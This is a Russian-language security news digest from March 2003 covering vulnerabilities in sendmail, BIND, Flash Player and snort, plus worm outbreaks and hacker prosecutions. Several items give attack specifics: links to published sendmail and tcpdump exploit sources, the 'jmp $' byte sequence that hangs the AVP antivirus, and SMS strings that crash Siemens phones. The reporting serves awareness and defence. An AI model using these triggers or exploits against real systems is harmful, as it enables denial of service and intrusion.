Как сообщается на slashzone.ru, компания Macromedia, разработчик одноименного флэш-плеера, сообщила об обнаружении очень серьезной уязвимости в системе защиты последней версии Macromedia Flash Player 6. Теоретически, дыра позволяет злоумышленникам запускать на компьютере жертвы произвольный исполняемый код. Суть проблемы сводится к тому, что дыра в так называемой «песочнице» - закрытой зоне, предназначенной для выполнения загружаемого из Сети программного кода, позволяет получить доступ к хранящимся на жестком диске пользователя файлам или запустить на выполнение какую-либо вредоносную программу. Пока что реальных случаев использования этой уязвимости зафиксировано не было. Тем не менее, в Macromedia настоятельно рекомендуют всем пользователям флэш-плеера установить соответствующую заплатку, которая, помимо уже описанной дыры, закрывает и еще несколько обнаруженных ранее недоработок программного обеспечения. Кроме того, этот же патч содержит и ряд обновлений, увеличивающих быстродействие плеера. Нужно также отметить, что в настоящее время Macromedia Flash Player 6 установлен примерно на 75% компьютеров по всему миру, так что теоретически под угрозой взлома оказалось подавляющее большинство пользователей. Обновленная версия плеера - Macromedia Flash Player 6.0.79.0 – доступна для загрузки на сайте компании. Подробности - http://story.news.yahoo.com/news?tmpl=story&u=/pcworld/20030304/tc_pcworld/109649 Новая версия - http://www.macromedia.com/v1/handlers/index.cfm?ID=23821
8/03/2003 12:35 Команда UINC поздравляет всех женщин с праздником!
Команда UINC от всей души поздравляет женщин, а также близких (матерей, сестёр, жён, подруг, бабушек) посетителей нашего сайта с праздником! Желаем всем женщинам счастья, красоты и любви! Источник - МЫ
8/03/2003 12:31 Microsoft выпускает тестовую версию Greenwich.
Microsoft выпустил бета-версию новой серверной технологии, поддерживающую отправку мгновенных сообщений и другого рода сервисы в рамках бизнес-взаимодействия. Программное обеспечение Greenwich включает функции защиты информации, инструментарий аутентификации и поддержку распределения информационных, видео и голосовых потоков между компьютерами. Microsoft планирует выпустить релизовую версию в конце этого года, как заявляет Эд Симнетт (Ed Simnett), ведущий продакт-менеджер Microsoft в области коммуникаций в режиме реального времени. Развитие новой технологии позволит Microsoft занять значительную долю на растущем рынке бизнес-коммуникаций, предполагающем общение через сетевые приложения для мгновенной отправки сообщений. В данный момент на корпоративном уровне используются технологии IBM и America Online. Симнетт утверждает, что объем данного рынка сопоставим с объемами рынка корпоративных пользователей электронной почты. Источник - http://www.cnews.ru
8/03/2003 12:24 Хакера из Казахстана посадят за решетку на 20 лет.
Американский суд оказался жестоким к российскому хакеру. Манхэттенские судьи собираются упрятать его в тюрьму лет эдак на двадцать. Жюри присяжных заседателей признала вину Олега Зезова - хакера из Казахстана. Его сочли виновным по четырём пунктам: преступный сговор, попытка шантажа, компьютерное вторжение и электронные письма с угрозами. Суд над казахстанским хакером начался 3 февраля. 29-летний умелец родом из Алма-Аты обвинялся во взломе компьютерной системы известного американского агентства финансовой информации Bloomberg. Кроме того, Зезов путем шантажа вымогал деньги у основателя агентства, нынешнего мэра Нью-Йорка Майкла Блумберга. Действовал хакер довольно искусно. Под именем таинственного Алекса он вступил в переписку с Майклом Блумбергом и предлагал помочь залатать прорехи в электронной защите Bloomberg. За такую услугу Зезов просил 200 тысяч долларов. В случае отказа Зазева обещал запустить информацию об уязвимости блумберговских компьютеров и содержащейся в них конфиденциальных сведениях клиентов в интернет. Задержали Олега Зезеву в Лондоне, куда он приехал получать деньги от своей жертвы. Окончательный приговор российскому хакеру американский суд вынесет 23 мая. Источник - http://www.viruslist.ru
8/03/2003 11:40 Организация займется «обезжириванием» спама.
Влиятельная группа по интернет-стандартизации приступила к серьезному изучению обостряющейся проблемы спама в электронной почте. Этот проект может иметь важные последствия для использования e-mail и защиты информации в будущем. Группа Anti-Spam Research Group созвана стараниями Internet Research Task Force, организации со свободным членством, входящей в состав союза Internet Engineering Task Force (IETF). Традиционно IETF в числе прочего отвечает за стандартизацию интернет-технологий, таких как e-mail, протоколы передачи данных и интернет-адреса. Новая группа представляет собой открытую исследовательскую и директивную организацию, результаты деятельности которой могут со временем изменить способ работы с электронными сообщениям в системах интернет-сервис-провайдеров и в сетях. В первую очередь Anti-Spam Working Group займется классификацией разных видов спама и предложений по борьбе с ним. Будут изучаться разнообразные идеи по созданию согласованных правил для различных средств связи, позволяющих владельцам сетей или пользователям отбраковывать сообщения, не отвечающие определенным стандартам. Кроме того, группа будет изучать способы выслеживания спамеров, которых часто бывает трудно опознать. Значительная часть подобных идей потребует внесения изменений в основополагающую технологию e-mail, и если стандарты окажутся спорными, на их согласование у IETF может уйти несколько лет. Первое заседание группы состоится 20 марта в офисе IETF в Сан-Франциско. Уже организован список рассылки e-mail для обсуждения проблемы. Подробности - http://www.irtf.org/charters/asrg.html
8/03/2003 11:17 Интернет-2 передает данные с рекордной скоростью.
Установлен новый мировой рекорд в скорости передачи данных посредством сети Интернет. Как утверждается на сайте BBC News, 6,7 гигабайт информации преодолели расстояние в 10978 километров менее чем за 60 секунд. Средняя скорость трафика составила 923 мегабита в секунду, что более чем в 3500 раз превышает стандартную скорость обмена. Передача данных осуществлялась через сеть Интернет-2, в создании которой принимают участие 200 ведущих научно-исследовательских центров. Представители корпораций, производящих программное обеспечение, и ученые называют Интернет-2 завтрашним днем всемирной сети. О сети Интернет-2 - http://www.internet2.edu/
8/03/2003 11:12 Американцы придумали, как бороться с веб-преступниками.
Правоохранительные органы США освоили новый способ борьбы с нарушениями законодательства в Интернете. Как сообщает сайт американской телекомпании CNN, у нарушителей теперь отбирают виртуальное имущество - доменные имена. В ходе нескольких операций, проведенных в течение последних недель, Департамент юстиции США отобрал права на несколько доменных имен. Как уточняют американские журналисты, ранее сайты-нарушители, обнаруженные правоохранительными органами, просто исчезали. Теперь же страницы остаются в Сети, но их посетители видят на этих страницах соответствующее предупреждение федеральных служб. "Если в хотите закрыть веб-сайт, можно конфисковать его сервер, но тогда его владельцы могут купить новый сервер. А если отбирают доменное имя, то фактически лишает нарушителей возможности продолжать их бизнес", - заявил Майкл Оверли (Michael Overly), юрист, специализирующийся по информационному праву. Подробности - http://www.cnn.com/2003/TECH/internet/03/05/net.forfeitures.ap/index.html
7/03/2003 13:11 Хакер "оккупировал" сайт ИНА.
Компьютерному хакеру из США удалось "оккупировать" на время интернетовский сайт официального иракского информационного агентства ИНА. Посетители сайта немало удивлялись, обнаруживая на одной из его страниц призывы к свержению Саддама Хусейна. Как сообщила межарабская газета "Аш-Шарк аль-Аусат", в данном случае речь не идет о традиционном взломе сайта. Некто Джеймс Болл из штата Флорида сумел воспользоваться ошибкой иракского спутникового телеканала, поддерживающего сайт ИНА. При перерегистрации адреса страницы в Интернете в него забыли внести имя файла, чем и воспользовался американский "умелец". Напомним, что в прошлом месяце Федеральное бюро расследований США призвало американских хакеров не трогать врагов Вашингтона. Руководство Центра защиты национальной инфраструктуры (NIPC) ФБР предупредило: "патриотический взлом" - такое же преступление, как и непатриотический. Но в особенности ФБР боится, что взлом "вражеских" сайтов может вызвать ответный удар Источник - http://www.crime-research.org
7/03/2003 12:25 Статья о безопасности DNS-серверов.
Возвращаясь опять к безопасности DNS-серверов, которые составляют важную часть правильного функционирования инсфраструктуры Интернет, хотелось бы обратить ваше внимание на очень инресный документ, подготовленный Mike Schiffman из nexus.com. Полное название документа "Bound by Tradition: A Sampling of the Security Posture of the Internet's DNS Servers". Собственно, посвящён он анализу уязвимостей в BIND - Приведён общий анализ и статистические выкладки. Статья - http://www.packetfactory.net/DNS/
7/03/2003 11:54 Очередная уязвимость в BIND.
Сообщается о появлении очередной уязвимости в BIND - системе разрешения доменнных имён в Интернет DNS-серверами. BIND выпускается и поддерживается ISC. Подробности уязвимости сначала не раскрывались, на сайте ISC появился анонс о выпуске новой версии BIND - 9.2.2, однако утверждалось, что были прикрыты 2 уязвимости, которые касались заплаток в библиотеке OpenSSL. Позвже стало известно, что уязвимость кроется в библиотеке 'libbind'. Используя переполнение буфера в этой библиотеке удалённый пользователь может выполнить произвольный код на DNS-сервере. Подробности - http://www.isc.org/products/BIND/bind-security.html
7/03/2003 11:33 Возможность DoS в AVP.
Обнаружена возможность проведения DoS против популярного антивируса AVP, выпускаемого "Лабораторией Касперского". Обнаружена Евгением Сучковым и опубликована на сайте ZARAZA (Нижний Новгород). Суть уязвимости - в ошибке эмуляции процессора AVP32. При проверке исполняемого файла win32-РЕ с первой выполняющейся командой: jmp $ (EB FE FF) AVP 3.5 зацикливается и загружает процессор на 100%. Также присутствует в Kaspersky Antivirus 4.0. На странице описания имеется тестовый файл, демонстрирующий уязвимость. Подробнее - http://www.security.nnov.ru/search/news.asp?binid=2631
7/03/2003 11:25 Уязвимость в утилите file.
Как сообщает iDEFENSE Labs, ими обнаружена уязвимость в распространённой в мире открытых систем утилите file, предназначенной для определения типа файла по анализу заголовка (определяется в /usr/share/magic). Некорректная обработка входных данных в системном вызове doshn() в файле readelf.c может привести к переполнению буфера, и, как следствие к возможности выполнения произвольного кода локальным пользователем от имени другого зарегистрированного пользователя. Уязвимость существует в версиях 3.37 и 3.39. Подробнее - http://www.idefense.com/advisory/03.04.03.txt
7/03/2003 11:02 Возможность повреждения лог-файлов многих Вэб-серверов.
Как сообщают господа из испанской группы Infohacking Research (Барселона), ими была разработанная довольно любопытная техника под названием ILLC, что расшифровывается, как Inverse Lookup Log Corruption, что можно перевести, как повреждение "логов" при инверсном разрешении адресов (то есть определение имени хоста по его IP-адресу). Суть техники заклюяается в том, что согласно RFC имена хостов в Интрнете могут содержать различные буквы, цифры и символы. Сформировав определённое доменное имя машины, можно обмануть механизм регистрации (ведения логов) Вэб-серверов. Утверждается, что очень многие Вэб-сервера обладают этой уязвимостью, хотя сами авторы проводили тестирование на Apache 2.0.44 (Windows/Linux) и Iplanet 6 (Windows). Использование описанной техники позволяет как скрыть истинный адрес клиента, сформировавшего запрос к Вэб-серверу, так и выполнить внедрение кода (XSS) на сервер, который затем может быть выполнен при просмотре логов различными прораммными анализаторами. Подробности - http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/ILLC/
7/03/2003 10:28 Компьютер - важный помощник следователя.
Полицейские по всему миру все чаще пользуются компьютерами для анализа информации в ходе следствия. Все полицейские службы Великобритании, американское ФБР и некоторые подразделения полиции в европейских странах используют созданную британскими компьютерщиками программу, графически представляющую связи между сотнями фактов, добытых в ходе расследования. Программа анализирует и отслеживает показания свидетелей, имена, адреса, телефоны, банковские счета и любые другие данные. Потом она отображает связи там, где порой они могли бы оказаться незамеченными. Особенно эффективна программа там, где имеется много данных о номерах мобильных телефонов и сообщениях с них. "Во многих случаях именно эта программа, улавливая связи между различными телефонными номерами, позволяла достичь прорыва в следствии", - свидетельствует Марк Эванс, начальник аналитического управления полиции Северной Ирландии. Один из самых свежих примеров использования программы i2 - дело снайперов, наводивших ужас на пригороды Вашингтона осенью прошлого года. В расследованиях о деятельности педофилов, которыми в последнее время сильно озабочена британская и американская полиция, программа i2 способна отслеживать компьютеры, с которых загружаются порнографические изображения, и каналы на чат-сайтах, где педофилы пытаются завести знакомства с несовершеннолетними. Источник - http://www.cnews.ru
7/03/2003 10:16 Вышла коммерческая версия Kaspersky Security для КПК.
"Лаборатория Касперского" объявила о выходе коммерческой версии Kaspersky Security для PDA 4.5. Новая версия продукта обеспечивает полномасштабную защиту карманных компьютеров, работающих под управлением операционных систем - Windows CE и Palm OS. Продукт включает двухуровневую систему контроля доступа к информации (система паролей и шифрация данных), а антивирусные базы можно автоматически обновлять через интернет. Антивирусная фильтрация данных осуществляется при помощи сканера и монитора. Сканер проводит проверку информации, хранящейся на КПК, включая карты расширения любого типа, ROM-файлы, базы данных, сетевые папки; антивирусный монитор в режиме реального времени обнаруживает и нейтрализует вредоносные программы в данных, передаваемых по технологии HotSyncTM или в процессе синхронизации с другими КПК. Kaspersky Security для PDA позволяет осуществить шифрацию любого типа данных, шифрование осуществляется "на лету": программа зашифровывает данные в момент сохранения и расшифровывает при каждом обращении к ним. На КПК, работающих под управлением Windows CE, предусмотрена возможность создания специальных папок, содержимое которых также шифруется "на лету" с использованием алгоритмов RC5 и RC6. Доступ к таким папкам разграничивается с помощью системы паролей. Источник - http://www.kaspersky.ru
6/03/2003 13:52 "Связной" Ethernet к бою готов.
Вездесущий стандарт локальных сетей Ethernet скоро начнет освоение рынка услуг связи: в августе появятся новые стандарты, обеспечивающие более дешевый трафик. Ethernet вытеснил всех конкурентов из локальных вычислительных сетей (ЛВС) компаний, за исключением разве что оптоволокна - и теперь готов штурмовать территорию сервис-провайдеров. Готовятся новые ориентированные на телекоммуникации версии стандарта, поддерживающие услуги связи от независимых поставщиков и обеспечивающие высокую надежность при гораздо более низких расходах по сравнению с существующими сетями. Работа над новыми стандартами и спецификациями Ethernet практически завершена, и в августе они должны быть утверждены. "Сервис-провайдеры уже могут начинать их использовать," - говорит президент Metro Ethernet Forum (MEF) Нан Чен (Nan Chen). "Следующей областью применения Ethernet станут городские сети связи (metropolitan, или metro networks), охватывающие как города, так и целые европейские страны. Стандарты MEF E-Line и E-LAN позволят сервис-провайдерам внедрять Ethernet в своих сетях". Если трафик в сетях дальней связи, соединяющих между собой населенные пункты, и в локальных сетях растет быстрыми темпами, то по городским сетям информации передается относительно мало. "За последнее десятилетие емкость локальных сетей увеличилась примерно в 100 раз, а емкость базовых сетей более чем в 300 раз, тогда как на самом деле узким местом оставались городские сети, пропускная способность которых выросла всего в 16 раз." - отметил Чен. Подробности - http://news.zdnet.co.uk/story/0,,t269-s2131413,00.html
6/03/2003 13:07 Новые вирусы в энциклопедии Касперского.
В Вирусной Энцилопедии Касперского появились описания трех новых вирусов. Первый из них вирус-червь Slackor распространяется по локальным сетям, если в них есть ресурсы, открытые на доступ. Червь содержит ряд ошибок и имеет очень мало шансов на "выживание". Slackor содержит несколько компонент: cnn3.exe - главная компонента червя (Win32 EXE-файл размером около 350K); abc.bat - BAT-файл (размер 1344 байт); main.exe - троянская компонента (Win32 EXE-файл, размер 53280 байт); psexec.exe - утилита удаленного запуска приложений (Win32 EXE-файл, размер 122880 байт); slacke-worm.exe - компонента перебора сетевых адресов (Win32 EXE-файл, размер 25K или 28K в зависимости от версии червя). Главная компонента червя является утилитой скрытного запуска самостоятельных EXE-файлов и определяется под именем "TrojanDropper.Win32.Yabinder". Подробнее о черве Slackor ... Achar представляет собой семейство червей, распространяющихся при помощи программного обеспечения сети Kazaa. Размножаются, создавая свои копии в общедоступной директориии Kazaa. Червь является приложением Windows (PE EXE), написан на ассемблере. Имеет размер около 8K. Червь также пытается копировать себя с именем "CUCARACHA.exe" в каталоги авто-запуска удаленных компьютеров, но этого не происходит по причине ошибок в коде червя. Червь содержит строку-"копирайт": -/Cucaracha\- Programado por ErGrone * SANTIAGO DE CHILE Подробнее о черве Achar... Интернет-червь Cult распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам и через сеть обмена файлами Kazaa. Содержит бекдор-процедуру. Червь является приложением Windows (PE EXE-файл), имеет размер около 13K, упакован FSG. Источник - http://www.viruslist.com
6/03/2003 12:41 "Троянец" на праздник.
"Лаборатория Касперского" сообщает о регистрации случая массовой рассылки поддельных поздравительных открыток, содержащих троянскую программу-шпиона "WMpatch" для похищения информации у пользователей российской платежной системы WebMoney. В ночь с 4 на 5 марта письмо, приглашающее посетить вредоносный Web-сайт и загрузить с него "троянца", было разослано многим пользователям Интернет: по разным оценкам это сообщение получили от нескольких сотен тысяч до миллиона адресатов. Вредоносные письма были разосланы с адреса "greeting_cards@yahoo.com". При посещении указанного в письме адреса пользователю предлагается скачать файл "viewcard_680fe23d52.asp.scr" и запустить его для просмотра открытки. В действительности файл является троянской программой "WMpatch", которая после активизации "дотаскивает" на пораженный компьютер с того же Web-сайта две дополнительные компоненты "троянца". Одна из них (файл DBOLE.EXE) модифицирует файл WMCLIENT.DLL для перехвата финансовых транзакций по системе WebMoney. Другая (SICKBOY.EXE) обеспечивает пересылку перехваченных данных на анонимный адрес чешского общедоступного почтового сервера. В результате пользователи WebMoney, подвергшиеся атаке "WMpatch", рискуют лишиться всех средств на своих персональных счетах этой платежной системы. Источник - http://www.kaspersky.ru
6/03/2003 11:35 Бразильские хакеры взломали кубинский сайт, протестуя против войны в Ираке.
На нынешней неделе неизвестные хакеры взломали сайты главной газеты Кубинской коммунистической партии Granma и государственного информационного агентства Кубы AIN. При этом на национальной и международной версиях сайта Granma был размещен антивоенный лозунг следующего содержания: "NO WAR F*** BUSH F*** USA". Эта надпись сопровождалась изображением бразильского флага и подписями хакеров. Администраторы сайта Granma подтвердили факт взлома в интервью западным информационным агентствам. По их словам, в осуществлении взлома подозревается одна из бразильских хакерских групп, что, в общем-то, естественно предположить, обнаружив на взломанной странице бразильский флаг. По информации BBC, взлом осуществил хакер по прозвищу Serial Killer, который, помимо имен своих соратников, оставил на сайте свой адрес электронной почты. Как был взломан сайт, принадлежащий информационным агентству AIN, не сообщается. Известно лишь, что вскоре после взлома он был отключен от интернета почти на целый день. Каким образом кубинские власти собираются ответить на взлом сайтов AIN и Granma, также неизвестно. Источник - http://www.reuters.com/
6/03/2003 10:29 Выпущен эксплоит уязвимости в sendmail.
Группа LSD (LAST STAGE OF DELIRIUM) из Польши выпустила эксплоит, который использует уязвимость в sendmail (мы писали о нахождении её группой ISS X-Force позавчера). Как пишется в описании на текущий момент он работает только в Slackware 8.0. Ждём появления для других дистрибуций. ;) Исходник - http://www.security.nnov.ru/files/linx86_sendmail.c
5/03/2003 19:39 За москвичами будет установлен тотальный контроль. А потом и за остальными.
За москвичами будет установлен тотальный контроль. А потом и за остальными. Планируется, что в 2003 г. более 2 млн. москвичей получат пластиковую карту «Социальная карта москвича». Ее можно использовать как идентификационное учетное и универсальное платежное средство. Город уже выделил из бюджета на эти цели 35 млн. рублей. Примерно столько же инвестировал эмитент карт. Эта акция является часть программы «Электронная Москва», а сама программа, в свою очередь, лишь частью большой программы «Электронная Россия». В дальнейшем опыт, полученный в г. Москве, предполагается распространить на другие субъекты федерации. Сейчас аналогичные проекты готовятся или уже начаты не только в Москве, но и в Московской области и трех других российских регионах. Таким образом, планируется, что вслед за москвичами подобные карты получат и остальные россияне. Но мало кто знает о всех возможностях этих карт... Уже роздано свыше 100 тысяч карт – в Зеленограде и ЮВАО. На безвозмездной основе были обеспечены льготные категории населения — пенсионеры и учащиеся ряда школ и Вузов. Карточка несет более 10 приложений, в частности — банковское, и приложения для оплаты проезда в Московском метрополитене. Cтруктура памяти пластиковой карты разделена на 16 секторов, емкость памяти чипа составляет 1 Kb. Каждый из секторов защищен специальным кодом и, соответственно, предназначен для считывания в устройствах Московского метро, Мосгортранса, Московской железной дороги, Московского городского фонда обязательного медицинского страхования, городских структур социальной защиты населения, ряда предприятий торговли и связи. Подробности - http://www.securitylab.ru/?ID=36263
5/03/2003 19:33 "Randon": берегите ваш 445 порт!
Будьте осторожны - зарегестрированы несколько случаев заражения новым сетевым червем "Randon". "Randon" представляет собой смесь червя и троянской программы и распространяется по IRC-каналам и ресурсам локальных сетей и заражает компьютеры под управлением операционных систем Windows 2000 и Windows XP. Для проникновения на компьютер он подключается к IRC-серверу (или локальной сети), сканирует находящихся на нем пользователей, устанавливает с ними соединение по порту 445 и пытается подобрать пароль из встроенного списка наиболее часто используемых фраз. В случае успешного взлома системы "Randon" пересылает на нее троянскую программу "Apher", которая, в свою очередь, загружает с удаленного Web-сайта остальные компоненты червя (всего 13 файлов, в том числе полноценный mIRC-клиент - программа для работы с IRC-каналами). После этого "Randon" устанавливает свои компоненты в системном каталоге Windows, регистрирует свой основной файл и mIRC-клиента в ключе автозапуска системного реестре Windows и запускает их на выполнение. Для сокрытия присутствия в памяти стороннего mIRC-клиента "Randon" использует специальную утилиту "HideWindows", которая также является одной из компонент червя. Благодаря ей он оказывается невидимым для пользователя, так что активный процесс "Randon" можно обнаружить только в диспетчере задач Windows. К счастью "Randon" не содержит каких-либо деструктивных функций. Его побочные эффекты - создание на зараженной машине большого объема избыточного трафика и переполнение IRC-каналов. Для защиты от червя достаточно загрузить последние обновления антивирусной программы, установить персональный межсетевой экран Kaspersky® Anti-Hacker или пользоваться длинными паролями доступа на компьютер. Источник - http://www.viruslist.ru
5/03/2003 18:48 IBM отзывает партию пожароопасных мониторов.
Компания IBM совместно с американской Комиссией по безопасности потребительских товаров (CPSC) приняла решение отозвать партию 15-дюймовых мониторов модели G51, проданных в период с июня по сентябрь 1997 года, сообщает PC Magazine. Как сообщили в компании, один из компонентов этих мониторов может перегреваться, что создает серьезную угрозу пожара. В IBM поступило пять писем от пользователей из США, Великобритании и Австралии, которые жаловались на перегрев мониторов. Всего предполагается изъять 56 тысяч мониторов, проданных в США, и еще 117 тысяч, проданных в других странах. IBM обещает заменить дефектную деталь и оплатить все расходы по доставке мониторов. Всего IBM выпустила 685 тысяч мониторов модели G51. Они продавались с сентября 1997 по декабрь 1998 года по цене 370 долларов. Подробнее - http://www.pc.ibm.com/g51recall/
5/03/2003 18:25 Американец расстрелял неисправный ноутбук.
Житель города Лафейетт (штат Колорадо) Джордж Даути расстрелял из пистолета принадлежащий ему ноутбук. Инцидент произошел после того, как компьютер в очередной раз "завис". На глазах у посетителей бара Sportsman's Bar and Restaurant, рассерженный владелец заведения вытащил пистолет и четыре раза выстрелил в устройство. Даути был задержан полицией по обвинению в незаконном применении оружия и угрозе общественной безопасности. Источник - http://www.lenta.ru
5/03/2003 18:22 Пробелы в защите Apache 2.0 для Windows вредят успеху продукта.
Как утверждается в недавнем отчете, большое количество пробелов в защите Windows-версии веб-сервера Apache не способствует широкому распространению этого продукта. Исследование веб-серверов, проведенное британской компанией Netcraft, показало, что Apache 2.0 for Windows внедряется медленно — возможно, это вызвано проблемами безопасности. В последнем отчете Netcraft говорится, что более 16 тыс. веб-сайтов под Windows, работающих на Apache Server 2.0, могут пострадать из-за пробелов в защите, появившихся с момента выпуска Windows-версии Apache 2.0. Спектр ошибок — от предоставления неавторизованным пользователям возможности изучать структуру каталога до атак на отказ в обслуживании, вызванных именами устройств особого формата. «Поражает то, что все это типичные уязвимости, которыми в прошлые годы страдали многие другие продукты, где они давно исправлены», — говорится в заявлении компании. Apache, веб-сервер с открытым исходным кодом, самый популярный веб-сервер в интернете: в феврале на нем работало около 66% веб-сайтов. Ближайшим конкурентом Apache остаются серверные продукты Microsoft, на которых работает около 24% обследованных веб-сайтов. Microsoft изо всех сил стремится упрочить свое положение на рынке серверов, считая это важным условием своей способности влиять на то, как люди используют интернет. Подробности - http://news.zdnet.co.uk/story/0,,t269-s2131405,00.html
5/03/2003 17:19 RIAA снова взломан, на этот раз Arvi The Hackerом.
Не успел сайт RIAA заработать, как опять был взломан. На этот раз автор взлома Arvi The Hacker. Уже 3 часа при заходе на главную страницу выдается надпись “Defaced by Arvi the Hacker”. Наверное, взлом оказался настолько сложным, что администраторы сайта до сих пор не в состоянии его устранить. Источник - http://www.securitylab.ru
4/03/2003 18:06 Уязвимость в трубах Siemens.
Как сообщают ребята из dwcgr0up ПО сотовых телефонов подвержено уязвимости. В частности, можно вызвать перезагрузку телефона, выдав на оный сообщения (СМС): "%Deutsch", %Polski" "%Magyar" "%English" "%Deutsch". Ну и как это воcпринимать? Как дискриминацию восточных славян? Есть один с пособ борьбы с этим блокированием - но вопрос не снимается. Подробности - http://www.dwcgr0up.com
4/03/2003 12:02 Уязвимоть в snort.
Уважаемый Дэйв Ахмад из BUGTRAQ опубликовал бюллетень, констатирующий наличие уязвимости в популярной IDS (система определения попыток вторжения) SNORT- уязвимостиь кроется в некорректной обработке RPC-запросов. Ввиду того, что SNORT стоит зачастую в сетях с критичной информацией, уязвимость довольно опасна. Подробности - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21951
4/03/2003 11:56 Бюллетень по безопасности Sygate.
Sygate выпустила бюллетень по безопасности, в котором подтверждается существование ранее существующей уязвимости SS20030221-0001 и обновление ПО. Подробности - http://www.sygate.com
4/03/2003 09:32 Cерьёзнейшая уязвимость в sendmail!
Вниманию всех СИСАДМИНов! В популярном почтовом агенте (MTA) sendmail обнаружена серьёзнейшая уязвимость, позволяющая при передаче специально сформированного почтового сообщения получить удалённый доступ на почтовом сервере! По существующей статистике процент почтовых серверов под управлением sendmail может достигать 50% в Интернет. Как сообщается, уязвимость была обнаружена Mark Dowd из ISS X-Force. Попытаемся вкратце изложить суть уязвимости. При приёме почтового сообщения sendmail производит разборку заголовков сообщения. Эти заголовки, в частности, содержат поля, содержащие адрес реципиента либо списка реципиентов ("From", "To", "CC"). В процессе семантического разбора этих полей производится проверка валидности адреса (либо списка адресов). При этом используется функция crackaddr() в файле headers.c. При обработка данных используется статический буфер, при этом sendmail проверяет заполненность буфера. При заполнении его дальнейшее заполнение символами прекращается и производится проверка накопленных данных при помощи нескольких тестов безопасности для того, чтобы убедиться, что символы интерпретированы корректно. В ходе анализа исходного кода было установлено, что одна из таких проверок работает некорректно, что делает возможным (при помощи специально формированного поля адреса) переполнить буфер на куче и выполнить произвольный код от имени пользователя, запустившего MTA (коммментарий ньюсмейкера - в сообщении от ISS почему-то утверждается, что этим пользователем будет root, однако, насколько я помню, с версии 8.11 задаётся пользователь mail, впрочем, компетенция ISS в этом вопросе не подлежит сомнению). Уязвимость была проверена ISS на рабочей конфигурации. Существует во всех версиях sendmail до 8.12.7 включительно. Sendmail.org в лице Claus Assmann анонсировала выход новой версии - 8.12.8, которая сейчас доступна на сайте в исходниках (при скачивании, вспомним о троянизировании ранее версии sendmail, рекомендуется проверять сигнатуры). В самом анонсе также подчёркивается, что в качестве временной меры рекомендуется отключить IDENT-проверку в .mc-файле: define(`confTO_IDENT', `0s'). Также отреагировал CERT - выпущен бюллетень CA-2003-07. "Отстрелялись" основные производители дистрибутивов - обновлены пакеты sendmail у RedHat, SGI, FreeBSD, IBM, SuSE, MandrakeSoft, Connectiva. В каждом из бюллетеней фирм-производителей отмечается, что опасность уязвимости заключается в том, что её невозможно перекрыть файрволлами при наличии во внутренней сети MTA sendmail. При наличии на мейл-эксченджерах (почтовых релэях) других MTA не предотвращает атаку, поскольку она передаётся в чистом виде к конечным почтовым серверам. Атака не оставляет НИКАКИХ следов в лог-фалах! В новой версии (8.12.8) при попытке атаки в лог-файле фиксируется запись вида: "Dropped invalid comments from header address". Предполагается наличие эксплоита, однако о появлении его в широких кругах пока ничего не известно. ISS также объявила о включение определения наличия уязвимости в свои продукты - Internet Scanner XPU и System Scanner SR. Описание - http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950 Бюллетень CERT - http://www.cert.org/advisories/CA-2003-07.html Senmail 8.12.8 (.tar.gz и .Z) - ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz
3/03/2003 17:23 Уязвимости протоколов маршрутизации угрожают Интернет.
Широкоиспользуемый протокол маршрутизации граничных шлюзов BGP (border gateway protocol) изобилует уязвимостями. Об этом сообщил в четверг консультант по безопасности Stephen Dugan на проходящей конференции Black Hat Security Briefing. Однако переход на его защищённый аналог Secure BGP требует очень больших финансовых затрат, что не по силам даже компьютерным корпорациям среднего уровня. Из-за уязвимости основных протоколов маршрутизации само существование Интернет находится под угрозой, - сказал также Стивен. Подробности - http://zdnet.com.com/2100-1105-990608.html
3/03/2003 14:09 Эксплоит для DoS TCPDUMP.
Ранее мы сообщали в новостях о существовании уязвимости в сниффере TCDUMP, возникающей при разборе ISAKMP-пакетов. Salvia Twist написан эксплоит, использующий эту уязвимость. Эксплоит - http://packetstorm.linuxsecurity.com/0303-exploits/ST-tcphump.c
3/03/2003 13:47 Голливуд снова решил посадить норвежского взломщика DVD.
Адвокаты, представляющие интересы голливудских кинокомпаний, добились от апелляционного суда Осло вторичного возбуждения уголовного дела против норвежца Йона Йохансена. 19-летний Йохансен обвиняется в том, что несколько лет назад написал программу, позволяющую незаконно скачивать из сети фильмы в формате DVD. Первый суд над ним состоялся в январе 2003 года, и в итоге Йохансен был признан невиновным. Но американские кинопроизводители намерены добиться наказания человеку, ставшему своеобразным символом для хакеров всего мира. Подробности - http://www.lenta.ru/internet/2003/03/02/jon/
3/03/2003 13:23 Новая версия серверной Windows выйдет через десять дней.
Microsoft назвала дату выпуска Windows Server 2003. Новая серверная операционая система поступит к производителям компьютеров 12 марта этого года, а к двадцатым числам апреля она уже появится в свободной продаже в Соединённых Штатах и Великобритании. Операционная система будет поставляться в четырех версиях, рассчитанных на пользователей с разными запросами. Windows Server 2003 Standard Edition предназначена для малого бизнеса и рынка SOHO (малый офис/домашний офис). Enterprise Edition позиционируется уже как мощная полнофункциональная система для предпрятий. Она поддерживает серверы на базе 64-разрядных процессоров, причём их количество может составлять до восьми штук, а объем оперативной памяти достигать 64 гигабайт. Windows Server 2003 Datacenter Edition в Microsoft называют наиболее мощной и функциональной версией серверной операционной системы за всю историю компании. Она поддерживает серверы с числом процессоров до 64 и объемом оперативной памяти до 512 гигабайт. Есть также Windows Server 2003 Web Edition, которая, как ясно из названия, предназначена для построения веб-серверов. Главный акцент в Windows Server 2003 был сделан на "облегчение" кода, возможность тонкой настройки системы и безопасность. Безопасность - это, как известно, больное место продуктов Microsoft. Серверные вирусы типа Slammer или Red Code, эпидемии которых угрожают нормальной работе всего интернета, живут и размножаются только благодаря дырам в продуктах Microsoft. Попытки свалить вину на нерадивых системных администраторов, недостаточно проворно скачивающих и устанавливающих обновления и заплатки весом в сотни мегабайт, не слишком состоятельны. Сервера на основе Unix-подобных систем распространены в интернете куда больше серверов с Windows, и дыр в программах для Unix тоже хватает, однако ни одной эпидемии, сравнимой с эпидемией Slammer, не было. Подробности - http://www.compulenta.ru/2003/3/3/37852/
3/03/2003 12:16 Выпущена русская версия StarOffice 6.
